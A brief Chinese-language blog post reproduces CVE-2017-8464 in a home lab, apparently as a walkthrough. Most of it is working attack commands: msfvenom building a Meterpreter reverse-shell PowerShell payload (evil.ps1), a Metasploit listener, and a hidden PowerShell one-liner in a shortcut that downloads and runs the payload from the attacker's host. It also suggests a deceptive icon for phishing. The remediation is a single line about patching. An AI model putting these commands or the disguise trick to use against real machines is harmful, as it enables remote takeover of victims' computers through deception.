CVE-2017-8464 复现

CVE-2017-8464

简介

通过在快捷方式里注入恶意代码,加载远程的恶意powershell脚本,执行命令。

测试环境

  • KALI: 192.168.6.129

  • windows 2008: 192.168.6.132

过程

  • 生成反弹shell的ps脚本

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.129 lport=4444 -f psh-reflection > /var/www/html/evil.ps1
  • 启动web服务器

service apache2 start
  • 监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.6.129
exploit -jz
  • 制作恶意快捷方式
    1.png

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.6.129/evil.ps1');test.ps1"
  • 技巧
    换个有欺骗性的图标

2.png

  • 上线

3.png

修复

打对应补丁

ps.
其实是个比较鸡肋的洞,甚至都不算漏洞。可能用来钓鱼提权还行。

标签: none

添加新评论